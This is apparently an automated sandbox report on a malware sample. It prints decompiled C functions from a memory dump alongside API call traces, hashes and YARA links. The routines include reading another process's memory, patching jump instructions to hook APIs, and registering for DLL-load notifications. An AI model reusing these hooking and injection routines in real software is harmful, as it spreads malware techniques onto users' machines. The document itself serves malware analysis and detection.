						_t26 = _v8;
						if(_t26 == _v12) {
							 *((char*)(_t31 + _t26)) = 0;
							 *_a8 = _t31;
							 *_a12 = _t26;
						} else {
							_t23 = 0x1e;
						}
						goto L9;
					}
				}
				_t23 = 0xe8;
				goto L9;
			}

0x00ab3085
0x00ab309a
0x00ab30a2
0x00ab30a7
0x00ab30fc
0x00ab3102
0x00ab3104
0x00ab3107
0x00ab310a
0x00ab310a
0x00ab3112
0x00ab3119
0x00ab3119
0x00ab3126
0x00ab3126
0x00ab30ab
0x00ab30b1
0x00ab30b6
0x00ab30c6
0x00ab30ca
0x00000000
0x00ab30e0
0x00ab30e0
0x00ab30e6
0x00ab30f0
0x00ab30f3
0x00ab30f8
0x00ab30e8
0x00ab30ea
0x00ab30ea
0x00000000
0x00ab30e6
0x00ab30ca
0x00ab30b8
0x00000000

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,00AB1A97,00B16CF4,00B16D04), ref: 00AB309C
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00AB1A97,00B16CF4,00B16D04,?,00AB1522,?,00000000), ref: 00AB30AB
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,00000001,?,?,?,?,00AB1A97,00B16CF4,00B16D04,?,00AB1522,?), ref: 00AB30D6
GetLastError.KERNEL32(?,?,?,?,00AB1A97,00B16CF4,00B16D04,?,00AB1522,?,00000000), ref: 00AB30FC
CloseHandle.KERNEL32(00000000,?,?,?,?,00AB1A97,00B16CF4,00B16D04,?,00AB1522,?,00000000), ref: 00AB310A
LocalFree.KERNEL32(00000000,?,?,?,?,00AB1A97,00B16CF4,00B16D04,?,00AB1522,?,00000000), ref: 00AB3119

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCreateErrorFreeHandleLastLocalReadSize
String ID:
API String ID: 2671872497-0
Opcode ID: c1906b15bee95c9df72cb7b9f332c413775f856fd72695cbf1b38a97ff3fdaac
Instruction ID: 0aaeaed1f272e806b3b95e7b499c2a6fd0f20d2c9f66cdde4963e7a9a502c08d
Opcode Fuzzy Hash: c1906b15bee95c9df72cb7b9f332c413775f856fd72695cbf1b38a97ff3fdaac
Instruction Fuzzy Hash: 4611B172A00609AFDF21AFA89C85BFE7A6CEF05764F100254F905A7292DA318E4196A0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB441C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71
libraryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00AB441C(void* __eflags) {
				char _v8;
				intOrPtr _v12;
				char* _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				char _v28;
				void* _t23;
				char* _t27;
				char _t28;
				struct HINSTANCE__* _t30;
				intOrPtr* _t31;
				char _t33;
				char _t35;
				char* _t36;
				intOrPtr _t37;
				intOrPtr _t40;
				struct HINSTANCE__* _t41;
				intOrPtr* _t45;

				_t41 = GetModuleHandleW(L"NTDLL.DLL");
				_t23 = E00AB44D1(_t41);
				_t33 = 0;
				if(_t23 != 0) {
					_t35 = 0;
					_t45 =  *((intOrPtr*)(_t23 + 0xc)) + _t41;
					_v8 = 0;
					_t40 =  *((intOrPtr*)(_t23 + 8)) + 0xfffffff8 + _t45;
					_v12 = _t40;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v16 =  &_v8;
					_t27 =  &_v28;
					_v20 = E00AB4593;
					_v24 = _t27;
					_v28 = _t27;
					while(_t45 <= _t40) {
						_t28 =  *_t45;
						if(_t28 == _t45 && _t28 ==  *((intOrPtr*)(_t45 + 4))) {
							_v28 = _t28;
							_t36 =  &_v28;
							_v24 = _t45;
							 *((intOrPtr*)(_t28 + 4)) = _t36;
							 *_t45 = _t36;
							_t30 = LoadLibraryA("ntdsapi.dll");
							if(_t30 != 0) {
								FreeLibrary(_t30);
							}
							_t37 = _v28;
							_t31 = _v24;
							_t40 = _v12;
							 *_t31 = _t37;
							 *((intOrPtr*)(_t37 + 4)) = _t31;
							_t35 = _v8;
							_t33 =  !=  ? _t45 : _t33;
						}
						_t45 = _t45 + 8;
						if(_t35 == 0) {
							continue;
						}
						break;
					}
				}
				return _t33;
			}

0x00ab442f
0x00ab4432
0x00ab4437
0x00ab443c
0x00ab4445
0x00ab444e
0x00ab4450
0x00ab4453
0x00ab445a
0x00ab445d
0x00ab445e
0x00ab445f
0x00ab4463
0x00ab4466
0x00ab4469
0x00ab4470
0x00ab4473
0x00ab4476
0x00ab447a
0x00ab447e
0x00ab4485
0x00ab4488
0x00ab448b
0x00ab448e
0x00ab4498
0x00ab449a
0x00ab44a2
0x00ab44a5
0x00ab44a5
0x00ab44ab
0x00ab44ae
0x00ab44b1
0x00ab44b4
0x00ab44b6
0x00ab44b9
0x00ab44be
0x00ab44be
0x00ab44c1
0x00ab44c6
0x00000000
0x00000000
0x00000000
0x00ab44c6
0x00ab44c8
0x00ab44d0

APIs

GetModuleHandleW.KERNEL32(NTDLL.DLL,00000008,00B16E00,?,?,00AB3F20,?,?,?), ref: 00AB4429
LoadLibraryA.KERNEL32(ntdsapi.dll,00000001), ref: 00AB449A
FreeLibrary.KERNEL32(00000000), ref: 00AB44A5

Strings

ntdsapi.dll, xrefs: 00AB4493
NTDLL.DLL, xrefs: 00AB4424

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Library$FreeHandleLoadModule
String ID: NTDLL.DLL$ntdsapi.dll
API String ID: 2140536961-4180381668
Opcode ID: 655e279bdb0dc59c357f3d485b842e9a06b0d612dfb37cfd04eb2809da120ba0
Instruction ID: 7f2da1e83dd950fc01ea3425423398a1f75c150002b852c2f8b2f8780b54a12b
Opcode Fuzzy Hash: 655e279bdb0dc59c357f3d485b842e9a06b0d612dfb37cfd04eb2809da120ba0
Instruction Fuzzy Hash: 61215071E016199FDB14DFA8D884AEEFBF8EF48310B14466AD809E7352D7709D41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB44FB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00AB44FB(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr* _t19;
				intOrPtr* _t20;
				_Unknown_base(*)()* _t22;
				intOrPtr _t24;
				intOrPtr* _t26;
				void* _t28;

				_t28 = 1;
				if(GetVersion() < 6) {
					__eflags =  *0xb16d9c;
					if(__eflags != 0) {
						L6:
						_t26 = E00AB1490(0x10);
						__eflags = _t26;
						if(_t26 == 0) {
							_t28 = 8;
						} else {
							 *((intOrPtr*)(_t26 + 8)) = _a4;
							 *((intOrPtr*)(_t26 + 0xc)) = _a8;
							 *((intOrPtr*)(_t26 + 4)) = _t26;
							 *_t26 = _t26;
							 *_a12 = _t26;
							_t24 =  *0xb16d9c; // 0x0
							_t19 =  *((intOrPtr*)(_t24 + 4));
							 *_t26 = _t24;
							 *((intOrPtr*)(_t26 + 4)) = _t19;
							 *_t19 = _t26;
							 *((intOrPtr*)(_t24 + 4)) = _t26;
							goto L8;
						}
					} else {
						_t20 = E00AB441C(__eflags);
						 *0xb16d9c = _t20;
						__eflags = _t20;
						if(_t20 != 0) {
							goto L6;
						}
					}
				} else {
					_t22 = GetProcAddress(GetModuleHandleW(L"NTDLL.DLL"), "LdrRegisterDllNotification");
					if(_t22 != 0) {
						_push(_a12);
						_push(_a8);
						_push(_a4);
						_push(0);
						if( *_t22() == 0) {
							L8:
							_t28 = 0;
						}
					}
				}
				return _t28;
			}

0x00ab4501
0x00ab450a
0x00ab453a
0x00ab4541
0x00ab4551
0x00ab4558
0x00ab455a
0x00ab455c
0x00ab458d
0x00ab455e
0x00ab4561
0x00ab4567
0x00ab456d
0x00ab4570
0x00ab4572
0x00ab4574
0x00ab457a
0x00ab457d
0x00ab457f
0x00ab4582
0x00ab4584
0x00000000
0x00ab4584
0x00ab4543
0x00ab4543
0x00ab4548
0x00ab454d
0x00ab454f
0x00000000
0x00000000
0x00ab454f
0x00ab450c
0x00ab451d
0x00ab4525
0x00ab4527
0x00ab452a
0x00ab452d
0x00ab4530
0x00ab4536
0x00ab4587
0x00ab4587
0x00ab4587
0x00ab4536
0x00ab4525
0x00ab4592

APIs

GetVersion.KERNEL32(?,?,00AB4005,00AB3902,?,?,?,00AB3F20,?,?,?), ref: 00AB4502
GetModuleHandleW.KERNEL32(NTDLL.DLL,LdrRegisterDllNotification,?,00AB4005,00AB3902,?,?,?,00AB3F20,?,?,?), ref: 00AB4516
GetProcAddress.KERNEL32(00000000), ref: 00AB451D

Strings

LdrRegisterDllNotification, xrefs: 00AB450C
NTDLL.DLL, xrefs: 00AB4511

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID: LdrRegisterDllNotification$NTDLL.DLL
API String ID: 3310240892-3368964806
Opcode ID: 4999ab3e86ca9921100356b48bb1888126532c1f110f12ea4f26628fb5ecbe3d
Instruction ID: b6587c00da337802617844434c68f00cf29a1f861d10c64ef1f999e5b362b261
Opcode Fuzzy Hash: 4999ab3e86ca9921100356b48bb1888126532c1f110f12ea4f26628fb5ecbe3d
Instruction Fuzzy Hash: 93111C70600A19AFCB15AFA9D800795BFFDBF48350F44C265F908CB263DA71DC818B91

Uniqueness

Uniqueness Score: -1.00%

Function 00AB3127, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AB3127(CHAR* _a4) {
				char* _t10;
				char* _t11;
				CHAR* _t13;

				_t13 = 0;
				if(_a4 != 0) {
					_t13 = E00AB1490(lstrlenA(_a4) + 3);
					if(_t13 != 0) {
						lstrcpyA(_t13, _a4);
						_t10 = StrRChrA(_t13, 0, 0x2e);
						if(_t10 != 0) {
							if( *((char*)(_t10 - 2)) != 0x36) {
								 *_t10 = 0x3436;
								_t11 =  &(_t10[2]);
							} else {
								_t11 =  &(_t10[0xfffffffffffffffe]);
							}
							 *_t11 = 0;
							lstrcatA(_t13, ".dll");
						}
					}
				}
				return _t13;
			}

0x00ab312b
0x00ab3130
0x00ab3144
0x00ab3148
0x00ab314e
0x00ab3159
0x00ab3161
0x00ab3167
0x00ab316e
0x00ab3173
0x00ab3169
0x00ab3169
0x00ab3169
0x00ab317c
0x00ab317f
0x00ab317f
0x00ab3161
0x00ab3148
0x00ab3189

APIs

lstrlenA.KERNEL32(?,00000000,?,00AB1A7B,?,?,00AB1522,?,00000000), ref: 00AB3135

Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496

lstrcpyA.KERNEL32(00000000,?,-00000003,?,00AB1A7B,?,?,00AB1522,?,00000000), ref: 00AB314E
StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00AB1A7B,?,?,00AB1522,?,00000000), ref: 00AB3159
lstrcatA.KERNEL32(00000000,.dll,?,00AB1A7B,?,?,00AB1522,?,00000000), ref: 00AB317F

Strings

.dll, xrefs: 00AB3176

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocLocallstrcatlstrcpylstrlen
String ID: .dll
API String ID: 3822144076-2738580789
Opcode ID: f49007d4fd6e22b4b2874933b50fb3d25135b88f82bf51581f00304a0f07d68c
Instruction ID: d9bf9edfcd2954d62a894b6bdb05d837214011c6c9e820c01c78fa8b81ba0b83
Opcode Fuzzy Hash: f49007d4fd6e22b4b2874933b50fb3d25135b88f82bf51581f00304a0f07d68c
Instruction Fuzzy Hash: D0F09633905614BBCF226BB8EC09BDABE6CAF05791F044354F50596163E6618A0187E5

Uniqueness

Uniqueness Score: -1.00%

Function 00AB1CE6, Relevance: 7.6, APIs: 5, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00AB1CE6(void* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				void* _v28;
				void _v40;
				void* _t24;
				intOrPtr _t32;
				void* _t38;
				void* _t42;
				void* _t44;
				void* _t47;
				void* _t49;

				_t47 = 0;
				_t49 = E00AB1490(0x1000);
				if(_t49 != 0) {
					_t38 = _a4;
					_t24 = E00AB2B39(_t38);
					_v12 = _t24;
					if(_t24 != 0 && ReadProcessMemory(_t38, _t24, _t49, 0x1000,  &_v8) != 0 && ReadProcessMemory(_t38,  *((intOrPtr*)(_t49 + 0x3c)) + _v12, _t49, 0x1000,  &_v8) != 0) {
						_t42 = _v12;
						_t47 =  *((intOrPtr*)(_t49 + 0x28)) + _t42;
						_v12 = 0x8664;
						_v16 = 0xd0;
						_t44 =  ==  ? _v16 : 0xc0;
						_t32 =  *((intOrPtr*)(0xc0 + _t49));
						if(_t32 != 0 &&  *((intOrPtr*)(_t44 + _t49 + 4)) != 0 && ReadProcessMemory(_t38, _t32 + _t42,  &_v40, 0x18,  &_v8) != 0 && _v28 != 0 && ReadProcessMemory(_t38, _v28, _t49, 0x1000,  &_v8) != 0) {
							_t47 =  !=  ?  *_t49 : _t47;
						}
					}
					LocalFree(_t49);
				}
				return _t47;
			}

0x00ab1cf3
0x00ab1cfa
0x00ab1cfe
0x00ab1d05
0x00ab1d09
0x00ab1d0e
0x00ab1d14
0x00ab1d50
0x00ab1d5f
0x00ab1d61
0x00ab1d6c
0x00ab1d73
0x00ab1d77
0x00ab1d7c
0x00ab1dbe
0x00ab1dbe
0x00ab1d7c
0x00ab1dc2
0x00ab1dc7
0x00ab1dcf

APIs

Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496

Part of subcall function 00AB2B39: memset.NTDLL ref: 00AB2B54
Part of subcall function 00AB2B39: ZwQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,?,?,00000000,00000000), ref: 00AB2B6A
Part of subcall function 00AB2B39: ReadProcessMemory.KERNEL32(00000000,00AB1D0E,?,000001E8,?,?,00000000,00000000), ref: 00AB2B86

ReadProcessMemory.KERNEL32(?,00000000,00000000,00001000,00000000,00000000,00001000,00000000,?,?,?,?,?,?,?,00AB190F), ref: 00AB1D26
ReadProcessMemory.KERNEL32(?,?,00000000,00001000,00000000,?,?,?,?,?,?,00AB190F,?,00000000), ref: 00AB1D46
ReadProcessMemory.KERNEL32(?,00008664,?,00000018,00000000), ref: 00AB1D93
ReadProcessMemory.KERNEL32(?,00000000,00000000,00001000,00000000), ref: 00AB1DB1
LocalFree.KERNEL32(00000000,00000000,00001000,00000000,?,?,?,?,?,?,?,00AB190F,?,00000000), ref: 00AB1DC2

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$MemoryRead$Local$AllocFreeInformationQuerymemset
String ID:
API String ID: 1829246340-0
Opcode ID: f31462e539dea1f6e3d812d511d2f6ed58d657b83b86a290a5d9169d48831a44
Instruction ID: 2bc86e487c6c2fb2df261f86b414774cf66be2fc23600c97fd6a902438ec9808
Opcode Fuzzy Hash: f31462e539dea1f6e3d812d511d2f6ed58d657b83b86a290a5d9169d48831a44
Instruction Fuzzy Hash: AB215C71A00614EFEB20DBA5CC55BEEBBFCEF44741F944455F94592182DB70E981CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB3802, Relevance: 7.6, APIs: 5, Instructions: 76
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00AB3802(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v24;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t24;
				char* _t32;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t47;
				void* _t50;

				_t24 = _a8;
				_t44 =  *((intOrPtr*)(_t24 + 0x3c));
				_t42 = _a16;
				_t47 =  *((intOrPtr*)(_t44 + _t24 + 0x78));
				_t53 = 1;
				if( *((intOrPtr*)(_t42 + 0x10)) <= _t47 ||  *((intOrPtr*)(_t42 + 0x10)) >=  *((intOrPtr*)(_t44 + _t24 + 0x7c)) + _t47) {
					L11:
					return _t53;
				} else {
					if(_a12 == 0) {
						_t53 = 0x1778;
						goto L11;
					}
					_t11 = _t42 + 8; // 0x55c35d5e
					_t50 = E00AB1490(lstrlenA( *_t11) + 1);
					if(_t50 == 0) {
						_t53 = 8;
						goto L11;
					}
					_t12 = _t42 + 8; // 0x55c35d5e
					lstrcpyA(_t50,  *_t12);
					_t32 = StrChrA(_t50, 0x2e);
					if(_t32 != 0) {
						 *_t32 = 0;
						_v24 =  &(_t32[1]);
						_t35 = _a4;
						_v32 = _t50;
						_t16 = _t35 + 0x10; // 0x0
						_v16 =  *_t16;
						_t37 = GetModuleHandleA(_t50);
						_t63 = _t37;
						if(_t37 != 0) {
							_push(_t42);
							_push(0);
							_push(_t37);
							_push( &_v32);
							_t53 = E00AB3B9F(_t42, _t50, 1, _t63);
							if(_t53 == 0) {
								_t40 = _a4;
								 *((intOrPtr*)(_t40 + 0x14)) = _v12;
								 *((intOrPtr*)(_t40 + 0x18)) = _v8;
							}
						}
					}
					LocalFree(_t50);
					goto L11;
				}
			}

0x00ab3805
0x00ab380b
0x00ab380f
0x00ab3813
0x00ab3819
0x00ab381e
0x00ab38bb
0x00ab38c3
0x00ab3833
0x00ab3837
0x00ab38b6
0x00000000
0x00ab38b6
0x00ab3839
0x00ab3849
0x00ab384d
0x00ab38b3
0x00000000
0x00ab38b3
0x00ab384f
0x00ab3853
0x00ab385c
0x00ab3864
0x00ab3866
0x00ab386a
0x00ab386d
0x00ab3871
0x00ab3874
0x00ab3877
0x00ab387a
0x00ab3880
0x00ab3882
0x00ab3884
0x00ab3885
0x00ab3887
0x00ab388b
0x00ab3891
0x00ab3898
0x00ab389a
0x00ab38a0
0x00ab38a6
0x00ab38a6
0x00ab3898
0x00ab3882
0x00ab38aa
0x00000000
0x00ab38aa

APIs

lstrlenA.KERNEL32(55C35D5E,00000004,00AB1B07,00000000,00B16948,?,00AB1B07), ref: 00AB383C

Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496

lstrcpyA.KERNEL32(00000000,55C35D5E,00000001,?,00AB1B07), ref: 00AB3853
StrChrA.SHLWAPI(00000000,0000002E,?,00AB1B07), ref: 00AB385C
GetModuleHandleA.KERNEL32(00000000,?,00AB1B07), ref: 00AB387A

Part of subcall function 00AB3B9F: VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,00AB5488,0000001C,00AB3B7D,00B169A8,00000004,00B16948,00000004,00B169A0,00000002,00000000,?,00AB3F7B), ref: 00AB3BEA
Part of subcall function 00AB3B9F: VirtualProtect.KERNEL32(00000000,00000005,00000040,?,00B16948,00000004,00B169A8), ref: 00AB3C45
Part of subcall function 00AB3B9F: VirtualProtect.KERNEL32(?,00000005,?,?), ref: 00AB3C80
Part of subcall function 00AB3B9F: VirtualProtect.KERNEL32(00000000,00000004,?,?,00B16948,00000004,00B169A8), ref: 00AB3C97
Part of subcall function 00AB3B9F: EnterCriticalSection.KERNEL32(00B16E20), ref: 00AB3CAA

LocalFree.KERNEL32(00000000,?,00AB1B07), ref: 00AB38AA

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ProtectVirtual$Local$AllocCriticalEnterFreeHandleModuleSectionlstrcpylstrlen
String ID:
API String ID: 1124667966-0
Opcode ID: 4120d1deecaaa9dcc156e024a94d359223fd58bc9467d759a36b4a3eed1b1b39
Instruction ID: 53e7996fa66eb8390a6d13639bdbb8409020d8b02044cfada1ee004b3179e631
Opcode Fuzzy Hash: 4120d1deecaaa9dcc156e024a94d359223fd58bc9467d759a36b4a3eed1b1b39
Instruction Fuzzy Hash: 7E216D32D002059FDB15EFA8D884BAA77BCBF48750F444169F8159B262DB71DE41CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2DC0, Relevance: 7.6, APIs: 5, Instructions: 75
fileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00AB2DC0(void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				CHAR* _v12;
				long _v16;
				void _v20;
				void* _t14;
				long _t19;
				void* _t27;
				intOrPtr _t36;
				struct _OVERLAPPED* _t37;

				_t36 = _a4;
				_t37 = 0;
				_t14 = E00AB29D6(__ecx, _t36,  &_v12);
				_t39 = _t14;
				if(_t14 == 0) {
					if(E00AB414A(__ebx, _t39, _t36, _a8) != 0) {
						_t19 = E00AB43B8(_t36, _t16 - _t36);
						_v8 = _t19;
						if(_t19 != 0) {
							_push(__ebx);
							_t27 = CreateFileA(_v12, 0x80000000, 1, 0, 3, 0x80, 0);
							if(_t27 != 0xffffffff) {
								if(SetFilePointer(_t27, _v8, 0, 0) == _v8 && ReadFile(_t27,  &_v20, 4,  &_v16, 0) != 0 && _v16 == 4) {
									_t37 = _v20 + _t36;
								}
								CloseHandle(_t27);
							}
						}
					}
					LocalFree(_v12);
				}
				return _t37;
			}

0x00ab2dcb
0x00ab2dce
0x00ab2dd2
0x00ab2dd9
0x00ab2ddb
0x00ab2dee
0x00ab2df4
0x00ab2df9
0x00ab2e00
0x00ab2e02
0x00ab2e1c
0x00ab2e21
0x00ab2e32
0x00ab2e53
0x00ab2e53
0x00ab2e56
0x00ab2e56
0x00ab2e5c
0x00ab2e00
0x00ab2e60
0x00ab2e60
0x00ab2e6c

APIs

Part of subcall function 00AB29D6: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB29F7
Part of subcall function 00AB29D6: LocalFree.KERNEL32(00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8,00000000), ref: 00AB2A0F

Part of subcall function 00AB414A: lstrcmpA.KERNEL32(?,00000004,00000004,00000004,00000000,00000004,00B169A8), ref: 00AB4196

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000008,?,00AB19FA,?,?,00000000), ref: 00AB2E16
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00AB2E29
ReadFile.KERNEL32(00000000,?,00000004,?,00000000,?,?,?,?,?,?,00000000), ref: 00AB2E40
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00AB2E56
LocalFree.KERNEL32(?,00000008,?,00AB19FA,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00AB2E60

Memory Dump Source

Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$FreeLocal$CloseCreateHandleModuleNamePointerReadlstrcmp
String ID:
API String ID: 883149339-0
Opcode ID: 55009df7d34432aed652086660cfc361a0cc8b64ca1bcf557fd2aca506c8080b
Instruction ID: f2ab83a9cc9106702f279f0f84e32981ba0d55d6c9f1eedd3a92db7f2197050a
Opcode Fuzzy Hash: 55009df7d34432aed652086660cfc361a0cc8b64ca1bcf557fd2aca506c8080b
Instruction Fuzzy Hash: B4119371910218BADB20ABA69C49FEF7FBDEF09760F100156F914A2092D631D94187A0

Uniqueness

Uniqueness Score: -1.00%

Function 00AB3A4F, Relevance: 7.6, APIs: 5, Instructions: 61
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00AB3A4F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t25;
				void* _t26;
				void* _t44;
				intOrPtr _t47;
				long _t49;
				void* _t50;

				_push(0x18);
				_push(0xab5498);
				E00AB1000(__ebx, __edi, __esi);
				_t49 = 0;
				 *(_t50 - 0x1c) = 0;
				 *(_t50 - 4) = 0;
				_t47 =  *((intOrPtr*)(_t50 + 8));
				_t25 =  *(_t47 + 0x1c) & 0x000000ff;
				 *(_t50 - 0x20) = _t25;
				_t26 = _t25 - 1;
				if(_t26 == 0) {
					L5:
					if(VirtualProtect( *(_t47 + 0xc), 4, 0x40, _t50 - 0x1c) == 0) {
						_t49 = GetLastError();
						 *((intOrPtr*)(_t50 - 0x28)) = _t49;
					} else {
						 *( *(_t47 + 0xc)) =  *(_t47 + 0x10);
						 *(_t47 + 0x1c) =  *(_t47 + 0x1c) & 0xfffffeff;
						VirtualProtect( *(_t47 + 0xc), 4,  *(_t50 - 0x1c), _t50 - 0x1c);
					}
					L9:
					 *(_t50 - 4) =  *(_t50 - 4) | 0xffffffff;
					return E00AB103B(_t49);
				}
				if(_t26 != 1) {
					goto L9;
				}
				_t44 =  *(_t47 + 0x14);
				if( *_t44 == 0xe9 && VirtualProtect(_t44, 5, 0x40, _t50 - 0x1c) != 0) {
					 *((intOrPtr*)(_t44 + 1)) =  *((intOrPtr*)(_t47 + 8)) - _t44 - 5;
					VirtualProtect(_t44, 5,  *(_t50 - 0x1c), _t50 - 0x1c);
				}
				goto L5;
			}

0x00ab3a4f
0x00ab3a51
0x00ab3a56
0x00ab3a5b
0x00ab3a5d
0x00ab3a60
0x00ab3a63
0x00ab3a66
0x00ab3a6a
0x00ab3a6d
0x00ab3a70
0x00ab3ab1
0x00ab3ac4
0x00ab3aef
0x00ab3b07
0x00ab3ac6
0x00ab3acc
0x00ab3ace
0x00ab3ae1
0x00ab3ae1
0x00ab3b0a
0x00ab3b0a
0x00ab3b15
0x00ab3b15
0x00ab3a75
0x00000000
0x00000000
0x00ab3a7b
0x00ab3a81
0x00ab3a9e
0x00ab3aab
0x00ab3aab
0x00000000

APIs

VirtualProtect.KERNEL32(?,00000005,00000040,00000000,00AB5498,00000018,00AB3A22,?,?,00AB3F2D,00000002,?,00AB3B38,?,00000000,00000000), ref: 00AB3A8C
VirtualProtect.KERNEL32(?,00000005,00000000,00000000,?,00AB3B38,?,00000000,00000000,00000000,?,00AB3F2D,?,?), ref: 00AB3AAB
